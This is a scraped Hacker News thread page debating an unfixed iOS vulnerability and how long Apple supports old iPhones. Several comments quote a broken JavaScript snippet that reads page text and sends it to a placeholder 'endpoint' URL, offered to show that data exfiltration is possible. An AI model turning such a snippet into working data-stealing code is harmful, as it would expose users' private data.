Live data from Hacker News

No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability

joshua.hu

141–150 of 242 posts

Re: No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability

#141
post #7

This is a 10 year old phone, released in 2014. Edit. I was wrong, 2015, sorry

This bug touches nothing hardware specific. In alternative timeline where mobile OSes arent fisher price parodies of proper operating systems, they could push the same image to all iphones and have a proper hardware abstraction layer take care of the specific details.

There is nothing fundamentally incompatible about the last couple of generation of iphones. ARMv8 CPU, PowerVR derived GPU. If the mobile computing space weren't driven by greed, this would be a non issue.

A Sandy Bridge era intel machine deployed in 2011 is easily capable of running the latest Linux, BSD or win10. And in the case of the first two, I'd wager it will continue to be viable for the foreseeable future.

Re: No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability

#142

Earlier quoted context omitted.

If it's "trivial", then perhaps the article should've demonstrated that.

If I prove I got a shell prompt on a remote device without any authentication, do I then need to show that I can execute arbitrary code? Or is it clearly implied? If the page body can read a file, then it can just execute an XmlHttpRequest to send that data to the origin server, which is the attacker in this scenario. This is just how the web works, nothing more to say about it, and no need to prove it.

It's not necessarily true that what can be read locally can be sent to a remote server.

Re: No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability

#143
post #113

Earlier quoted context omitted.

[flagged]

Yes, obviously the website can retrieve this data too. var olis=document.getElemeByTagName(‘p’); Data=olis[1].text content; xmlHttp2 = new XMLHttpRequest; xmlHttp2.open(‘GET’, ‘https://endpoint/?data=‘+data); xmlHttp2.send();

Only took 7 hours to get something that looks like it might work but clearly has tons of syntax errors and won't work as-is.

What are y'all trying to hide?

Re: No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability

#144
post #111

Always a smile when I see my blog posted on hn:) To answer three questions: 1) this was not reported in the context of any bug bounty[0], and the total conversation between me and Apple is 4 emails (1: hello do you plan to fix this? 2: can you reproduce this on the newest ios17? 3: no. 4: if you are able to reproduce it on ios17 let us know) 2) exfiltration is obviously possible, I’m not sure why I would even need to…

> exfiltration is obviously possible, I’m not sure why I would even need to specify that any page is able to read its own contents using JavaScript

Things that are obvious to you may be non-obvious to other people, including the readers of your blog.

Re: No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability

#145
post #14

Earlier quoted context omitted.

Correct. The issue is it is not commonly known that Apple isn't actually backporting fixes for exploits while it has been claiming to update the phones: this is earth-shaking[^1] news [^1] It would be completely reasonable to say "Earth-shaking? Really? You expect security backports for a decade?" I've been in mobile my whole career, iOS for 7 years, starting from jailbreaking the original iPhone, then worked on Andr…

Touche. P.S. Keep in mind though, what is the state of security of the Android phone you bought new in November 2015?

Is the only standard to which we hold one company whatever the other does? Is there no room for higher principles here, in your view? The competition between consumer brands is all that matters?

Come on.

Re: No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability

#146
post #113

Earlier quoted context omitted.

Yes, obviously the website can retrieve this data too. var olis=document.getElemeByTagName(‘p’); Data=olis[1].text content; xmlHttp2 = new XMLHttpRequest; xmlHttp2.open(‘GET’, ‘https://endpoint/?data=‘+data); xmlHttp2.send();

Only took 7 hours to get something that looks like it might work but clearly has tons of syntax errors and won't work as-is. What are y'all trying to hide?

You are too smart to die on this absurd hill, knock it off.

Re: No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability

#147
I think a lot of people here are missing an important point here that Apple has always been fairly ambiguous about what their level of support is for older devices beyond major feature updates.

If it weren't for a friend giving me his old iPhone XS as thanks for a favor, I'd probably still be using my old iPhone 6s--and I would not have worried about it from a security perspective purely because (as the article notes) Apple is still releasing security fixes for iOS 15. I'd feel differently if Apple had publicly stated that all iOS 15 security fixes from now on will be on a minimum effort basis only.

Re: No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability

#148
post #113

Earlier quoted context omitted.

Yes, obviously the website can retrieve this data too. var olis=document.getElemeByTagName(‘p’); Data=olis[1].text content; xmlHttp2 = new XMLHttpRequest; xmlHttp2.open(‘GET’, ‘https://endpoint/?data=‘+data); xmlHttp2.send();

Only took 7 hours to get something that looks like it might work but clearly has tons of syntax errors and won't work as-is. What are y'all trying to hide?

Typed from my phone. I don't reply to hn comments based on your schedule.

Re: No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability

#149
post #7

This is a 10 year old phone, released in 2014. Edit. I was wrong, 2015, sorry

This bug touches nothing hardware specific. In alternative timeline where mobile OSes arent fisher price parodies of proper operating systems, they could push the same image to all iphones and have a proper hardware abstraction layer take care of the specific details. There is nothing fundamentally incompatible about the last couple of generation of iphones. ARMv8 CPU, PowerVR derived GPU. If the mobile computing spa…

It’s not economical to support devices used by less than 1% of the user base. Linux only manages it because community members step up to support older architectures. And sometimes when no one steps up the architectures are removed.

- Linux dropping support for old graphics drivers (Nov 2023) - https://www.phoronix.com/news/Linux-Drop-Old-UMS-DRM-Infra

- Linux Kernel Developers Discuss Dropping A Bunch Of Old CPUs (Jan 2021) - https://www.phoronix.com/news/2021-Linux-Drop-Old-CPUs

Supporting all of these is work. It makes development of new features harder, because it has to account for quirks of older hardware. Older hardware is also harder to get in the hands of developers and harder to test on. That’s why Linux has dropped support for 386, 486, IA-64 and other architectures.

There’s no point saying trillion dollar corporation etc. It comes down to some basic fact - phones must be built with SoCs, that’s the easiest way. The PC way doesn’t work at scale. Now that we are on SoCs you have to draw the line on support somewhere. Just because the costs imposed on future development aren’t obvious to us doesn’t mean they don’t exist.

I think 5 years minimum (and sometimes more) of OS updates is pretty good, FWIW.

Re: No new iPhone? No secure iOS: Looking at an unfixed iOS vulnerability

#150
Apple, in my opinion, does a very good job of supporting old devices. Buying an iPhone and keeping it for 6 years is a great strategy and when amortising the cost of the phone over those 6 years, it's price competitive with Android.

I do wish legislators forced Apple and Google to give users a path to install an alternative OS on their device. That would enable old iPhones(and Androids) to have their lifetime extended further.

Post reply on HN